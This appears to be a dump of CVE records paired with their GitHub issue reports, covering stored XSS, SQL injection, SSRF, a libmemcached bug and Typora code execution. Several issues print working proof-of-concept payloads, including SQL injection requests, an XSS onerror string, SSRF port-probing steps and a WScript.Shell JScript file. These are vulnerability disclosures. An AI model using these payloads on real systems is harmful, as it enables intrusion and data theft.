[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/keheying/onekeyadmin/issues/8
[ "Exploit" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:storage xss vulnerability๏ผˆCross-site scripting๏ผ‰ 4. Vulnerability Details๏ผš url http://192.168.3.129:8091/admin1#admin/index <img width="990" alt="image" src="https://user-images.githubusercontent.com/122217858/211448923-cc5a1f39-eacc-4087-b7e2-fce1c31c5589.png"> poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"id":"","cover":"","account":"test<img src=1 onerror=alert(\"xss\");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"} <img width="1030" alt="image" src="https://user-images.githubusercontent.com/122217858/211448968-fecf17b0-a8de-486d-a996-8460d5c5a55e.png"> then you can view xss in url http://192.168.3.129:8091/admin1#admin/index <img width="993" alt="image" src="https://user-images.githubusercontent.com/122217858/211448987-a4e80247-9438-4702-a6d6-dc1659046993.png">
Background administrator management - Adding an administrator has a storage xss vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/8/comments
1
2023-01-10T02:36:01Z
2023-03-20T02:14:35Z
https://github.com/keheying/onekeyadmin/issues/8
1,526,664,640
8
4,806
CVE-2023-25223
2023-03-07T17:15:12.703
CRMEB <=1.3.4 is vulnerable to SQL Injection via /api/admin/user/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/crmeb/crmeb_java/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/crmeb/crmeb_java/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:crmeb:crmeb_java:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B0CB136-8432-4A7D-ADED-3C0E15826090", "versionEndExcluding": null, "versionEndIncluding": "1.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/crmeb/crmeb_java/issues/9
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "crmeb", "crmeb_java" ]
[Suggested description] sql injection vulnerability exists in crmeb_java <=1.3.4 /api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli [Vulnerability Type] SQLi [Vendor of Product] https://github.com/crmeb/crmeb_java [Affected Product Code Base] <=1.3.4 [Affected Component] GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2 Host: api.java.crmeb.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a Origin: https://admin.java.crmeb.net Referer: https://admin.java.crmeb.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers [Attack Type] Remote [Vulnerability details] step 1 login admin click user Manager and click search button ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/66862331/215452131-5c0de824-05ad-49a2-82cf-ed2348d01991.png) step 2 intercept request use burpsuite ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/66862331/215452732-2290cfc6-b8fd-4775-947c-cd988ad73004.png) step 3 insert payload in paramter โ€œlevelโ€ `level=1+and+extractvalue(1,CONCAT(1,user()))` `https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%` ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/66862331/215453041-6c1fbebe-cb88-45b2-b795-182bf9eac435.png) there you can see it [Impact Code execution] true [Cause of vulnerability] \crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml line 36 "${level}" When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/66862331/215453870-1ca05f7c-e480-4e68-8540-2af5597b4e3c.png)
There is a sql injection vulnerability exists in crmeb_java
https://api.github.com/repos/crmeb/crmeb_java/issues/9/comments
0
2023-01-30T10:40:30Z
2023-01-30T10:40:30Z
https://github.com/crmeb/crmeb_java/issues/9
1,562,181,249
9
4,807
CVE-2023-25230
2023-03-07T17:15:12.757
A Server-Side Request Forgery (SSRF) in loonflow r2.0.14 allows attackers to force the application to make arbitrary requests via manipulation of the hook_url parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/blackholll/loonflow/issues/402" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/blackholll/loonflow/issues/402" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:loonflow_project:loonflow:r2.0.14:*:*:*:*:*:*:*", "matchCriteriaId": "6669BFE8-2FBE-4FC0-A983-4A0627ED9E52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/blackholll/loonflow/issues/402
[ "Exploit", "Issue Tracking" ]
github.com
[ "blackholll", "loonflow" ]
## ISSUE TEMPLATE ไฝฟ็”จ็š„็‰ˆๆœฌ: r2.0.14 ้—ฎ้ข˜่ฏฆ็ป†ๆ่ฟฐ: The ssrf vulnerability exists in the system. After the admin logged in, Create a new workflow, set the participant type to hook, and set the participant's hook_url parameter to the Intranet address. Example: {" hook_url ":" http://127.0.0.1:8000/ ", "hook_token" : "111", "wait" : false, "extra_info" : "111"} ![image](https://user-images.githubusercontent.com/30886624/215487923-96ef1791-1f11-484f-a780-ab7ca9b41b9f.png) Select the workflow we created in the new build order ![image](https://user-images.githubusercontent.com/30886624/215484167-7a4c6666-0dbd-4a03-a0c9-cc7d4db910df.png) Viewing the operation history about the work order, the system is Expecting "line 1 column 1 (char 0)". ![image](https://user-images.githubusercontent.com/30886624/215484591-b87e42cc-fe7a-4adb-8913-d7f9923a1daf.png) When the accessed port is closed, Connection refused is refused, for example, HTTPConnectionPool(host='127.0.0.1', port=8808): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f1ad48cc048>: Failed to establish a new connection: [Errno 111] Connection refused',))" In this way, we can judge whether the port on the Intranet is open according to different errors. For example, if I write "hook_url" to http://127.0.0.1:6379, there will be an error: "('Connection aborted.', RemoteDisconnected('Remote end closed connection without response',))", so that you can determine that redis services exist on the Intranet. In addition, packets can be sent to Intranet services through this function, causing dos attacks. ![image](https://user-images.githubusercontent.com/30886624/215486932-5f80447d-8b73-4d07-990f-61d7dd6128b0.png) The cause of the leak: There are no restrictions on the request address ![image](https://user-images.githubusercontent.com/30886624/215486813-937603d4-806e-4a6a-882e-0d0958921103.png)
The ssrf vulnerability exists in the system.
https://api.github.com/repos/blackholll/loonflow/issues/402/comments
4
2023-01-30T13:12:15Z
2023-04-05T15:40:44Z
https://github.com/blackholll/loonflow/issues/402
1,562,425,158
402
4,808
CVE-2023-24775
2023-03-07T18:15:09.117
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/9
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš member.memberLevel#selectFields[value] has sql injection vulnerability Vulnerability location app\backend\controller\member\MemberLevel.php# is called app\backend\controller\member\Member.php#index method <img width="1236" alt="image" src="https://user-images.githubusercontent.com/122217858/215309941-416a9f66-1d33-4012-9ac0-c10b9ac32ab2.png"> After getting the parameter selectFields here, continue to enter selectFields method app\common\traits\Curd.php#selectList <img width="1216" alt="image" src="https://user-images.githubusercontent.com/122217858/215309958-90115150-9e5e-4232-b21c-e9def690218c.png"> Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced โ€‹โ€‹into sql without filtering to cause sql injection Vulnerability recurrence poc `GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=name&selectFields%5Bvalue%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29 HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip` <img width="1235" alt="image" src="https://user-images.githubusercontent.com/122217858/215309975-16063592-a7df-4fbf-9e78-1a375358d04f.png">
member.memberLevel#selectFields[value] has sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/9/comments
1
2023-01-29T06:48:24Z
2023-05-05T06:40:41Z
https://github.com/funadmin/funadmin/issues/9
1,561,151,535
9
4,809
CVE-2023-27478
2023-03-07T18:15:09.247
libmemcached-awesome is an open source C/C++ client library and tools for the memcached server. `libmemcached` could return data for a previously requested key, if that previous request timed out due to a low `POLL_TIMEOUT`. This issue has been addressed in version 1.1.4. Users are advised to upgrade. There are several ways to workaround or lower the probability of this bug affecting a given deployment. 1: use a reasonably high `POLL_TIMEOUT` setting, like the default. 2: use separate libmemcached connections for unrelated data. 3: do not re-use libmemcached connections in an unknown state.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/awesomized/libmemcached/commit/48dcc61a" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes" ], "url": "https://github.com/awesomized/libmemcached/releases/tag/1.1.4" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/awesomized/libmemcached/security/advisories/GHSA-wwmh-39wj-fx59" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/php-memcached-dev/php-memcached/issues/531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/awesomized/libmemcached/commit/48dcc61a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/awesomized/libmemcached/releases/tag/1.1.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/awesomized/libmemcached/security/advisories/GHSA-wwmh-39wj-fx59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/php-memcached-dev/php-memcached/issues/531" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:awesome:libmemcached:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF53F985-00CD-43AB-B56F-A9764400C86A", "versionEndExcluding": "1.1.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.0.18", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/php-memcached-dev/php-memcached/issues/531
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "php-memcached-dev", "php-memcached" ]
After upgrading to libmemcached to 3.1.5-6, I'm sometimes (!) getting random results when calling the get method. There's no error, but the returned value is from a different key. This does not happen on every request. I've narrowed this error down to `OPT_POLL_TIMEOUT` option. When set to lower than 500ms this starts to happen. It seems that if `OPT_POLL_TIMEOUT` happens, the library returns a seemingly random value without any error. It does not happen when `OPT_POLL_TIMEOUT` is set to default 1000ms value or omitted. Not sure if it's an issue of libmemcached or php-memcached though. PHP version: ``` php -v PHP 8.1.12 (cli) (built: Oct 25 2022 17:30:00) (NTS gcc x86_64) Copyright (c) The PHP Group Zend Engine v4.1.12, Copyright (c) Zend Technologies with Zend OPcache v8.1.12, Copyright (c), by Zend Technologies ``` memcache* libraries: ``` rpm -qa | grep memcached remi-libmemcached-awesome-1.1.3-1.el7.remi.x86_64 libmemcached-1.0.16-5.el7.x86_64 php81-php-pecl-memcached-3.2.0-1.el7.remi.x86_64 libmemcached-opt-libs-1.0.18-2.el7.remi.x86_64 memcached-1.6.16-1.el7.remi.x86_64 php80-php-pecl-memcached-3.1.5-4.el7.remi.x86_64 ``` some memcache stats ``` echo 'stats' | nc localhost 11211 STAT version 1.6.16 STAT libevent 2.0.21-stable END ``` I will be more than happy to provide more debug info.
get returns random values when lower than default OPT_POLL_TIMEOUT is set
https://api.github.com/repos/php-memcached-dev/php-memcached/issues/531/comments
42
2023-01-09T08:19:04Z
2023-07-21T06:32:32Z
https://github.com/php-memcached-dev/php-memcached/issues/531
1,525,131,293
531
4,810
CVE-2023-1003
2023-03-07T20:15:09.010
A vulnerability, which was classified as critical, was found in Typora up to 1.5.5 on Windows. Affected is an unknown function of the component WSH JScript Handler. The manipulation leads to code injection. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.8 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221736.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/5623" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.221736" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.221736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/5623" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.221736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.221736" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "D65201A0-91A0-43DA-A36F-56146438135D", "versionEndExcluding": null, "versionEndIncluding": "1.5.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "94" ]
94
https://github.com/typora/typora-issues/issues/5623
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
## Description Although typora filters most dangeruos suffix, it still retains the `.js` file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution. Version: 0.9.78-1.5.5(latest) ![demo](https://user-images.githubusercontent.com/25031216/217757913-c1a92e7b-e84d-47e7-a70b-f838bdcbf800.gif) ## Attachment [poc.md](https://github.com/typora/typora-issues/files/10694941/poc.md) poc.html ```html <!-- auto download !--> <html> <script> var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'}); var a = document.createElement('a'); a.href = window.URL.createObjectURL(blob); a.download = 'poc.js'; a.click(); </script> </html> <!-- click to download !--> <a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a> ``` poc.js ```js var WshShell = new ActiveXObject("WScript.Shell"); var ret = WshShell.run("calc"); if (ret == 0) WScript.Echo("You were hacked.") WScript.Quit(); ```
Typora on Windows fails to properly filter WSH JScript, which may result in code execution
https://api.github.com/repos/typora/typora-issues/issues/5623/comments
2
2023-02-09T08:35:38Z
2023-02-14T04:41:13Z
https://github.com/typora/typora-issues/issues/5623
1,577,464,121
5,623
4,811
CVE-2023-24780
2023-03-08T00:15:08.937
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/columns.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/6
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Database management plug-in table.php columns-sql injection vulnerability Vulnerability occurs in plugin - database management plugin <img width="1225" alt="image" src="https://user-images.githubusercontent.com/122217858/215309736-8c5d44ae-9189-46ed-acb5-fe1a6b022538.png"> Code Audit Process Vulnerability occurs in app\databases\controller\table.php#columns method <img width="1221" alt="image" src="https://user-images.githubusercontent.com/122217858/215309744-0a978832-6f79-4dfe-92b6-c104c4453797.png"> <img width="1218" alt="image" src="https://user-images.githubusercontent.com/122217858/215309750-cc539543-229f-4438-9177-b5a6202dc35a.png"> Get the id directly and splice it into the sql statement Vulnerability recurrence sqlmap poc save as txt `GET /databases/table/columns?id=* HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close` python sqlmap.py -r poc.txt <img width="1025" alt="image" src="https://user-images.githubusercontent.com/122217858/215309782-84ef2c78-efad-4c65-81dd-b8ef245d1e92.png"> `GET /databases/table/columns?id='+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: 